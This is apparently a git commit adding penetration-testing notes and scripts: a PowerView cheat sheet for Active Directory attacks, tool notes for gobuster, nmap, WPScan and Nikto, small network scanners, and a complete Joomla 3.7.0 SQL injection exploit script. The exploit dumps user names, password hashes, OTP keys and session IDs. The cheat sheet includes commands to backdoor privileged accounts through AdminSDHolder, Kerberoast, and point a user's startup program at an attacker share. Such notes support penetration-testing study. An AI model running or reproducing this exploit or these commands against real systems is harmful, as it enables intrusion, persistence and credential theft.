second commit
This commit is contained in:
parent
7bb194b436
commit
d4648a2f18
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 975a23ae3487a57c9919a8386cf1d1a2049aa631
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit d943001a7defb5e0d1657085a77a0e78609be58f
|
|
@ -0,0 +1,207 @@
|
||||||
|
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
|
||||||
|
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
|
||||||
|
|
||||||
|
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
|
||||||
|
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
|
||||||
|
|
||||||
|
# New function naming schema:
|
||||||
|
# Verbs:
|
||||||
|
# Get : retrieve full raw data sets
|
||||||
|
# Find : ‘find’ specific data entries in a data set
|
||||||
|
# Add : add a new object to a destination
|
||||||
|
# Set : modify a given object
|
||||||
|
# Invoke : lazy catch-all
|
||||||
|
# Nouns:
|
||||||
|
# Verb-Domain* : indicates that LDAP/.NET querying methods are being executed
|
||||||
|
# Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration
|
||||||
|
# Verb-Net* : indicates that Win32 API access is being used under the hood
|
||||||
|
|
||||||
|
|
||||||
|
# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
|
||||||
|
Get-DomainGroup -MemberIdentity <User/Group>
|
||||||
|
|
||||||
|
# get all the effective members of a group, 'recursing down'
|
||||||
|
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
|
||||||
|
|
||||||
|
# use an alterate creadential for any function
|
||||||
|
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
|
||||||
|
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
|
||||||
|
Get-DomainUser -Credential $Cred
|
||||||
|
|
||||||
|
# retrieve all the computer dns host names a GPP password applies to
|
||||||
|
Get-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}
|
||||||
|
|
||||||
|
# get all users with passwords changed > 1 year ago, returning sam account names and password last set times
|
||||||
|
$Date = (Get-Date).AddYears(-1).ToFileTime()
|
||||||
|
Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset
|
||||||
|
|
||||||
|
# all enabled users, returning distinguishednames
|
||||||
|
Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
|
||||||
|
Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
|
||||||
|
|
||||||
|
# all disabled users
|
||||||
|
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
|
||||||
|
Get-DomainUser -UACFilter ACCOUNTDISABLE
|
||||||
|
|
||||||
|
# all users that require smart card authentication
|
||||||
|
Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
|
||||||
|
Get-DomainUser -UACFilter SMARTCARD_REQUIRED
|
||||||
|
|
||||||
|
# all users that *don't* require smart card authentication, only returning sam account names
|
||||||
|
Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
|
||||||
|
Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname
|
||||||
|
|
||||||
|
# use multiple identity types for any *-Domain* function
|
||||||
|
'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff
|
||||||
|
|
||||||
|
# find all users with an SPN set (likely service accounts)
|
||||||
|
Get-DomainUser -SPN
|
||||||
|
|
||||||
|
# check for users who don't have kerberos preauthentication set
|
||||||
|
Get-DomainUser -PreauthNotRequired
|
||||||
|
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
|
||||||
|
|
||||||
|
# find all service accounts in "Domain Admins"
|
||||||
|
Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}
|
||||||
|
|
||||||
|
# find users with sidHistory set
|
||||||
|
Get-DomainUser -LDAPFilter '(sidHistory=*)'
|
||||||
|
|
||||||
|
# find any users/computers with constrained delegation st
|
||||||
|
Get-DomainUser -TrustedToAuth
|
||||||
|
Get-DomainComputer -TrustedToAuth
|
||||||
|
|
||||||
|
# enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation
|
||||||
|
$Computers = Get-DomainComputer -Unconstrained
|
||||||
|
$Users = Get-DomainUser -AllowDelegation -AdminCount
|
||||||
|
|
||||||
|
# return the local *groups* of a remote server
|
||||||
|
Get-NetLocalGroup SERVER.domain.local
|
||||||
|
|
||||||
|
# return the local group *members* of a remote server using Win32 API methods (faster but less info)
|
||||||
|
Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local
|
||||||
|
|
||||||
|
# Kerberoast any users in a particular OU with SPNs set
|
||||||
|
Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
|
||||||
|
|
||||||
|
# Find-DomainUserLocation == old Invoke-UserHunter
|
||||||
|
# enumerate servers that allow unconstrained Kerberos delegation and show all users logged in
|
||||||
|
Find-DomainUserLocation -ComputerUnconstrained -ShowAll
|
||||||
|
|
||||||
|
# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
|
||||||
|
Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
|
||||||
|
|
||||||
|
# find all computers in a given OU
|
||||||
|
Get-DomainComputer -SearchBase "ldap://OU=..."
|
||||||
|
|
||||||
|
# Get the logged on users for all machines in any *server* OU in a particular domain
|
||||||
|
Get-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}}
|
||||||
|
|
||||||
|
# enumerate all gobal catalogs in the forest
|
||||||
|
Get-ForestGlobalCatalog
|
||||||
|
|
||||||
|
# turn a list of computer short names to FQDNs, using a global catalog
|
||||||
|
gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname}
|
||||||
|
|
||||||
|
# enumerate the current domain controller policy
|
||||||
|
$DCPolicy = Get-DomainPolicy -Policy DC
|
||||||
|
$DCPolicy.PrivilegeRights # user privilege rights on the dc...
|
||||||
|
|
||||||
|
# enumerate the current domain policy
|
||||||
|
$DomainPolicy = Get-DomainPolicy -Policy Domain
|
||||||
|
$DomainPolicy.KerberosPolicy # useful for golden tickets ;)
|
||||||
|
$DomainPolicy.SystemAccess # password age/etc.
|
||||||
|
|
||||||
|
# enumerate what machines that a particular user/group identity has local admin rights to
|
||||||
|
# Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation
|
||||||
|
Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
|
||||||
|
|
||||||
|
# enumerate what machines that a given user in the specified domain has RDP access rights to
|
||||||
|
Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP
|
||||||
|
|
||||||
|
# export a csv of all GPO mappings
|
||||||
|
Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv
|
||||||
|
|
||||||
|
# use alternate credentials for searching for files on the domain
|
||||||
|
# Find-InterestingDomainShareFile == old Invoke-FileFinder
|
||||||
|
$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
|
||||||
|
$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password)
|
||||||
|
Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential
|
||||||
|
|
||||||
|
# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
|
||||||
|
Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local
|
||||||
|
|
||||||
|
# grant user 'will' the rights to change 'matt's password
|
||||||
|
Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose
|
||||||
|
|
||||||
|
# audit the permissions of AdminSDHolder, resolving GUIDs
|
||||||
|
Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs
|
||||||
|
|
||||||
|
# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
|
||||||
|
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
|
||||||
|
|
||||||
|
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
|
||||||
|
Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
|
||||||
|
($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
|
||||||
|
}
|
||||||
|
|
||||||
|
# find linked DA accounts using name correlation
|
||||||
|
Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname}
|
||||||
|
|
||||||
|
# save a PowerView object to disk for later usage
|
||||||
|
Get-DomainUser | Export-Clixml user.xml
|
||||||
|
$Users = Import-Clixml user.xml
|
||||||
|
|
||||||
|
# Find any machine accounts in privileged groups
|
||||||
|
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}
|
||||||
|
|
||||||
|
# Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights
|
||||||
|
Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')}
|
||||||
|
|
||||||
|
# find all policies applied to a current machine
|
||||||
|
Get-DomainGPO -ComputerIdentity windows1.testlab.local
|
||||||
|
|
||||||
|
# enumerate all groups in a domain that don't have a global scope, returning just group names
|
||||||
|
Get-DomainGroup -GroupScope NotGlobal -Properties name
|
||||||
|
|
||||||
|
# enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships
|
||||||
|
# query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames
|
||||||
|
$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname
|
||||||
|
$Domains = @{}
|
||||||
|
$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) {
|
||||||
|
# extract the domain the foreign user was added to
|
||||||
|
$ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
|
||||||
|
# check if we've already enumerated this domain
|
||||||
|
if (-not $Domains[$ForeignUserDomain]) {
|
||||||
|
$Domains[$ForeignUserDomain] = $True
|
||||||
|
# enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
|
||||||
|
$Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))"
|
||||||
|
Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$ForeignMemberships | fl
|
||||||
|
|
||||||
|
# if running in -sta mode, impersonate another credential a la "runas /netonly"
|
||||||
|
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
|
||||||
|
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
|
||||||
|
Invoke-UserImpersonation -Credential $Cred
|
||||||
|
# ... action
|
||||||
|
Invoke-RevertToSelf
|
||||||
|
|
||||||
|
# enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer
|
||||||
|
Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
|
||||||
|
|
||||||
|
# set the specified property for the given user identity
|
||||||
|
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
|
||||||
|
|
||||||
|
# Set the owner of 'dfm' in the current domain to 'harmj0y'
|
||||||
|
Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
|
||||||
|
|
||||||
|
# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
|
||||||
|
Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? {
|
||||||
|
($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')
|
||||||
|
}
|
||||||
|
|
||||||
|
# check if any user passwords are set
|
||||||
|
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
|
||||||
|
|
|
@ -0,0 +1,17 @@
|
||||||
|
# Antivirus Evasion
|
||||||
|
|
||||||
|
* Existing types
|
||||||
|
* On-Disk evasion
|
||||||
|
* In-Memory evasion
|
||||||
|
|
||||||
|
* Detection Methods
|
||||||
|
* Static Detection -- Hash or String/Byte Matching
|
||||||
|
* Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox
|
||||||
|
|
||||||
|
|
||||||
|
## Links
|
||||||
|
* [cmnatic](https://cmnatic.co.uk/)
|
||||||
|
* [cmnatic's diss](https://resources.cmnatic.co.uk/Presentations/Dissertation/)
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 5fc1c93767878028c0f8c74de37cb9dee1659f60
|
Binary file not shown.
|
@ -0,0 +1,48 @@
|
||||||
|
# Gobuster
|
||||||
|
|
||||||
|
[Repo](https://github.com/OJ/gobuster.git)
|
||||||
|
|
||||||
|
### Directories
|
||||||
|
```sh
|
||||||
|
gobuster dir -u <URL> -w <wordlist>
|
||||||
|
```
|
||||||
|
|
||||||
|
### DNS
|
||||||
|
```sh
|
||||||
|
gobuster dns -d <domainName> -w <wordlist> --show-cname --show-ips --resolver <dns-Server>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Vhosts
|
||||||
|
* Find other Domains on a host via `seclists/Discovery/DNS/subdomains-top1million-5000.txt`
|
||||||
|
```sh
|
||||||
|
gobuster vhost -u <URL> -w <wordlist>
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### FileExtension
|
||||||
|
```sh
|
||||||
|
-x
|
||||||
|
```
|
||||||
|
* Fuzz for files and file extensions
|
||||||
|
```sh
|
||||||
|
gobuster dir -u <URL> -w /usr/share/seclists/Discovery/raft-small-word-lowercase.txt -x .conf,.js
|
||||||
|
```
|
||||||
|
|
||||||
|
### Basic Auth
|
||||||
|
```sh
|
||||||
|
gobuster help dir
|
||||||
|
```
|
||||||
|
* `--username` and `--password`
|
||||||
|
|
||||||
|
* `dir -s` Accept HTTP Status
|
||||||
|
* `dir -k` Skip TLS Auth
|
||||||
|
* `dir -a` User Agent
|
||||||
|
|
||||||
|
### Wordlists
|
||||||
|
```sh
|
||||||
|
/usr/share/seclists/Discovery/Web-Content/common.txt
|
||||||
|
/usr/share/seclists/Discovery/Web-Content/big.txt
|
||||||
|
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
|
||||||
|
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
|
||||||
|
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
|
||||||
|
```
|
|
@ -0,0 +1,17 @@
|
||||||
|
# nmap
|
||||||
|
|
||||||
|
# Usage
|
||||||
|
|
||||||
|
```sh
|
||||||
|
nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit <IP>
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
nmap -oA nmap-vuln -Pn -script vuln -p <Port,Port,Port,...> <IP>
|
||||||
|
```
|
||||||
|
|
||||||
|
## combo with searchsploit
|
||||||
|
* nmap-full scan
|
||||||
|
```sh
|
||||||
|
sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit <target-IP>
|
||||||
|
searchsploit --nmap ./nmap-full.xml --verbose
|
||||||
|
```
|
|
@ -0,0 +1,35 @@
|
||||||
|
# WPScan
|
||||||
|
|
||||||
|
## Themes
|
||||||
|
```sh
|
||||||
|
wpscan --url <URL> --enumerate t
|
||||||
|
```
|
||||||
|
|
||||||
|
* `ls` for content
|
||||||
|
|
||||||
|
## Plugins
|
||||||
|
```sh
|
||||||
|
wpscan --url <URL> --enumerate p
|
||||||
|
```
|
||||||
|
|
||||||
|
## Users
|
||||||
|
```sh
|
||||||
|
wpscan --url <URL> --enumerate u
|
||||||
|
```
|
||||||
|
|
||||||
|
## Vulnerabilities
|
||||||
|
* WPVulnDB API is needed
|
||||||
|
* Plugins
|
||||||
|
```sh
|
||||||
|
wpscan --url <URL> --enumerate vp
|
||||||
|
```
|
||||||
|
|
||||||
|
## Password attack
|
||||||
|
```sh
|
||||||
|
wpscan --url <URL> --passwords <wordlist> --usernames <usersFromEnumeration>
|
||||||
|
```
|
||||||
|
|
||||||
|
## WAF Aggressiveness
|
||||||
|
```sh
|
||||||
|
wpscan --url <URL> --enumerate p --plugins-detection <aggressive/passive>
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit f7bc13252b4da5d13b2e9d93295da28a1f612125
|
|
@ -0,0 +1,186 @@
|
||||||
|
#!/usr/bin/python3
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
import re
|
||||||
|
import argparse
|
||||||
|
import os
|
||||||
|
import random
|
||||||
|
import time
|
||||||
|
import binascii
|
||||||
|
|
||||||
|
|
||||||
|
def extract_token(resp):
|
||||||
|
match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S)
|
||||||
|
if match is None:
|
||||||
|
print(" [!] Cannot find CSRF token")
|
||||||
|
return None
|
||||||
|
return match.group(1)
|
||||||
|
|
||||||
|
|
||||||
|
def parse_options():
|
||||||
|
parser = argparse.ArgumentParser(description='Jooma Exploit')
|
||||||
|
parser.add_argument('url', help='Base URL for Joomla site')
|
||||||
|
return parser.parse_args()
|
||||||
|
|
||||||
|
|
||||||
|
def build_sqli(colname, morequery):
|
||||||
|
return "(SELECT " + colname + " " + morequery + ")"
|
||||||
|
|
||||||
|
def joomla_370_sqli_extract(options, sess, token, colname, morequery):
|
||||||
|
sqli = build_sqli("LENGTH("+colname+")", morequery)
|
||||||
|
length = joomla_370_sqli(options, sess, token, sqli)
|
||||||
|
if not length:
|
||||||
|
return None
|
||||||
|
length = int(length)
|
||||||
|
maxbytes = 30
|
||||||
|
offset = 0
|
||||||
|
result = ''
|
||||||
|
while length > offset:
|
||||||
|
sqli = build_sqli("HEX(MID(%s,%d,%d))" % (colname, offset + 1, 16), morequery)
|
||||||
|
value = joomla_370_sqli(options, sess, token, sqli)
|
||||||
|
if not value:
|
||||||
|
print(" [!] Failed to retrieve string for query:", sqli)
|
||||||
|
return None
|
||||||
|
value = binascii.unhexlify(value)
|
||||||
|
result += value
|
||||||
|
offset += len(value)
|
||||||
|
return result
|
||||||
|
|
||||||
|
|
||||||
|
def joomla_370_sqli(options, sess, token, sqli):
|
||||||
|
sqli_full = "UpdateXML(2, concat(0x3a," + sqli + ", 0x3a), 1)"
|
||||||
|
data = {
|
||||||
|
'option': 'com_fields',
|
||||||
|
'view': 'fields',
|
||||||
|
'layout': 'modal',
|
||||||
|
'list[fullordering]': sqli_full,
|
||||||
|
token: '1',
|
||||||
|
}
|
||||||
|
resp = sess.get(options.url + "/index.php?option=com_fields&view=fields&layout=modal", params=data, allow_redirects=False)
|
||||||
|
match = re.search(r'XPATH syntax error:\s*'([^$\n]+)\s*'\s*</bl', resp.text, re.S)
|
||||||
|
if match:
|
||||||
|
match = match.group(1).strip()
|
||||||
|
if match[0] != ':' and match[-1] != ':':
|
||||||
|
return None
|
||||||
|
return match[1:-1]
|
||||||
|
|
||||||
|
|
||||||
|
def extract_joomla_tables(options, sess, token):
|
||||||
|
tables = list()
|
||||||
|
first = False
|
||||||
|
offset = 0
|
||||||
|
while True:
|
||||||
|
result = joomla_370_sqli_extract(options, sess, token, "TABLE_NAME", "FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT " + str(offset) + ",1" )
|
||||||
|
if result is None:
|
||||||
|
if first:
|
||||||
|
print("[!] Failed to retrieve first table name!")
|
||||||
|
return False
|
||||||
|
break
|
||||||
|
tables.append(result)
|
||||||
|
print(" - Found table:", result)
|
||||||
|
first = False
|
||||||
|
offset += 1
|
||||||
|
return tables
|
||||||
|
|
||||||
|
|
||||||
|
def extract_joomla_users(options, sess, token, table_name):
|
||||||
|
users = list()
|
||||||
|
offset = 0
|
||||||
|
first = False
|
||||||
|
print(" - Extracting users from", table_name)
|
||||||
|
while True:
|
||||||
|
result = joomla_370_sqli_extract(options, sess, token, "CONCAT(id,0x7c,name,0x7c,username,0x7c,email,0x7c,password,0x7c,otpKey,0x7c,otep)", "FROM %s ORDER BY registerDate ASC LIMIT %d,1" % (table_name, offset) )
|
||||||
|
if result is None:
|
||||||
|
if first:
|
||||||
|
print("[!] Failed to retrieve user from table!")
|
||||||
|
return False
|
||||||
|
break
|
||||||
|
result = result.split('|')
|
||||||
|
print(" [$] Found user",result)
|
||||||
|
first = False
|
||||||
|
offset += 1
|
||||||
|
users.append(result)
|
||||||
|
return users
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def extract_joomla_sessions(options, sess, token, table_name):
|
||||||
|
sessions = list()
|
||||||
|
offset = 0
|
||||||
|
first = False
|
||||||
|
print(" - Extracting sessions from", table_name)
|
||||||
|
while True:
|
||||||
|
result = joomla_370_sqli_extract(options, sess, token, "CONCAT(userid,0x7c,session_id,0x7c,username)", "FROM %s WHERE guest = 0 LIMIT %d,1" % (table_name, offset) )
|
||||||
|
if result is None:
|
||||||
|
if first:
|
||||||
|
print("[!] Failed to retrieve session from table!")
|
||||||
|
return False
|
||||||
|
break
|
||||||
|
result = result.split('|')
|
||||||
|
print(" [$] Found session", result)
|
||||||
|
first = False
|
||||||
|
offset += 1
|
||||||
|
sessions.append(result)
|
||||||
|
return sessions
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def pwn_joomla_again(options):
|
||||||
|
sess = requests.Session()
|
||||||
|
|
||||||
|
print(" [-] Fetching CSRF token")
|
||||||
|
resp = sess.get(options.url + "/index.php/component/users/?view=login")
|
||||||
|
token = extract_token(resp)
|
||||||
|
if not token:
|
||||||
|
return False
|
||||||
|
|
||||||
|
# Verify that we can perform SQLi
|
||||||
|
print(" [-] Testing SQLi")
|
||||||
|
result = joomla_370_sqli(options, sess, token, "128+127")
|
||||||
|
if result != "255":
|
||||||
|
print(" [!] Could not find SQLi output!")
|
||||||
|
return False
|
||||||
|
|
||||||
|
tables = extract_joomla_tables(options, sess, token)
|
||||||
|
|
||||||
|
for table_name in tables:
|
||||||
|
table_prefix = table_name[:-5]
|
||||||
|
extract_joomla_users(options, sess, token, table_name)
|
||||||
|
extract_joomla_sessions(options, sess, token, table_prefix + 'session')
|
||||||
|
|
||||||
|
return True
|
||||||
|
|
||||||
|
def print_logo():
|
||||||
|
clear = "\x1b[0m"
|
||||||
|
colors = [31, 32, 33, 34, 35, 36]
|
||||||
|
|
||||||
|
logo = """
|
||||||
|
.---. .-'''-. .-'''-.
|
||||||
|
| | ' _ \ ' _ \ .---.
|
||||||
|
'---' / /` '. \ / /` '. \ __ __ ___ /| | | .
|
||||||
|
.---.. | \ ' . | \ ' | |/ `.' `. || | | .'|
|
||||||
|
| || ' | '| ' | '| .-. .-. '|| | | < |
|
||||||
|
| |\ \ / / \ \ / / | | | | | ||| __ | | __ | |
|
||||||
|
| | `. ` ..' / `. ` ..' / | | | | | |||/'__ '. | | .:--.'. | | .'''-.
|
||||||
|
| | '-...-'` '-...-'` | | | | | ||:/` '. '| |/ | \ | | |/.'''. \
|
||||||
|
| | | | | | | ||| | || |`" __ | | | / | |
|
||||||
|
| | |__| |__| |__|||\ / '| | .'.''| | | | | |
|
||||||
|
__.' ' |/\'..' / '---'/ / | |_| | | |
|
||||||
|
| ' ' `'-'` \ \._,\ '/| '. | '.
|
||||||
|
|____.' `--' `" '---' '---'
|
||||||
|
"""
|
||||||
|
for line in logo.split("\n"):
|
||||||
|
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
|
||||||
|
#time.sleep(0.05)
|
||||||
|
|
||||||
|
def main(base_url):
|
||||||
|
options = parse_options()
|
||||||
|
options.url = options.url.rstrip('/')
|
||||||
|
print_logo()
|
||||||
|
pwn_joomla_again(options)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
sys.exit(main("http://192.168.10.100:8080/joomla"))
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit 9cfb81e4fab8037acb44c678773ca3f93bc2b39c
|
|
@ -0,0 +1,16 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
from scapy.all import *
|
||||||
|
|
||||||
|
interface = "wls3"
|
||||||
|
ip_range = "192.168.179.0/24"
|
||||||
|
broadcastMac = "ff:ff:ff:ff:ff:ff"
|
||||||
|
|
||||||
|
packet = Ether(dst=broadcastMac)/ARP(pdst=ip_range)
|
||||||
|
|
||||||
|
ans, unans = srp(packet, timeout=2, iface=interface, inter=0.1)
|
||||||
|
|
||||||
|
for send, receive in ans:
|
||||||
|
print(receive.sprintf(r"%Ether.src% - %ARP.psrc%"))
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,16 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
|
||||||
|
sub_dirs = []
|
||||||
|
with open ("/home/whackx/Downloads/wordlist2.txt", 'r') as _f:
|
||||||
|
sub_dirs = _f.read().splitlines()
|
||||||
|
|
||||||
|
for dir in sub_dirs:
|
||||||
|
dir_enum = f"http://{sys.argv[1]}/{dir}.html"
|
||||||
|
r = requests.get(dir_enum)
|
||||||
|
if r.status_code == 404:
|
||||||
|
pass
|
||||||
|
else:
|
||||||
|
print("Valid directory: ", dir_enum)
|
|
@ -0,0 +1,7 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import requests
|
||||||
|
|
||||||
|
url = "https://download.sysinternals.com/files/PSTools.zip"
|
||||||
|
r = requests.get(url, allow_redirects=True)
|
||||||
|
open("PSTools.zip", 'wb').write(r.content)
|
|
@ -0,0 +1,35 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import socket
|
||||||
|
import pyfiglet
|
||||||
|
|
||||||
|
print(pyfiglet.figlet_format("Port Scanner"))
|
||||||
|
|
||||||
|
ip = sys.argv[1]
|
||||||
|
open_ports = []
|
||||||
|
ports = range(1,10000)
|
||||||
|
|
||||||
|
def probe_port(ip, port, result = 1):
|
||||||
|
try:
|
||||||
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
sock.settimeout(0.5)
|
||||||
|
r = sock.connect_ex((ip,port))
|
||||||
|
if r == 0:
|
||||||
|
result = r
|
||||||
|
sock.close()
|
||||||
|
except Exception as e:
|
||||||
|
pass
|
||||||
|
return result
|
||||||
|
|
||||||
|
for port in ports:
|
||||||
|
sys.stdout.flush()
|
||||||
|
response = probe_port(ip, port)
|
||||||
|
if response == 0:
|
||||||
|
open_ports.append(port)
|
||||||
|
|
||||||
|
if open_ports:
|
||||||
|
print("[+] Open Ports are: ")
|
||||||
|
print(sorted(open_ports))
|
||||||
|
else:
|
||||||
|
print("[-] No Open Ports")
|
|
@ -0,0 +1,22 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
import requests
|
||||||
|
import sys
|
||||||
|
|
||||||
|
subdomains = []
|
||||||
|
|
||||||
|
with open ("/home/whackx/Downloads/wordlist2.txt", 'r') as _f:
|
||||||
|
subdomains = _f.read().splitlines()
|
||||||
|
|
||||||
|
for sub in subdomains:
|
||||||
|
http_domain = f"http://{sub}.{sys.argv[1]}"
|
||||||
|
|
||||||
|
try:
|
||||||
|
requests.get(http_domain)
|
||||||
|
|
||||||
|
except requests.ConnectionError:
|
||||||
|
pass
|
||||||
|
|
||||||
|
else:
|
||||||
|
print("Valid domain: ", http_domain)
|
||||||
|
|
|
@ -0,0 +1,32 @@
|
||||||
|
# Nikto
|
||||||
|
Scan web server vulnerabilities and more.
|
||||||
|
|
||||||
|
## mmap Input
|
||||||
|
* Pipe or pre run nmap
|
||||||
|
```sh
|
||||||
|
nmap -p80 172.16.0.0/24 -oG - | nikto -h -
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
nmap -oG -Pn -p-10000 10.10.214.141 | nikto -h 10.10.214.141 -p -
|
||||||
|
```
|
||||||
|
|
||||||
|
# Usage
|
||||||
|
|
||||||
|
* Example
|
||||||
|
```
|
||||||
|
nikto -h http://example.com i -p 80,8080
|
||||||
|
```
|
||||||
|
```sh
|
||||||
|
nikto -id <user>:<password> -h http://example.com:1234/manager/html
|
||||||
|
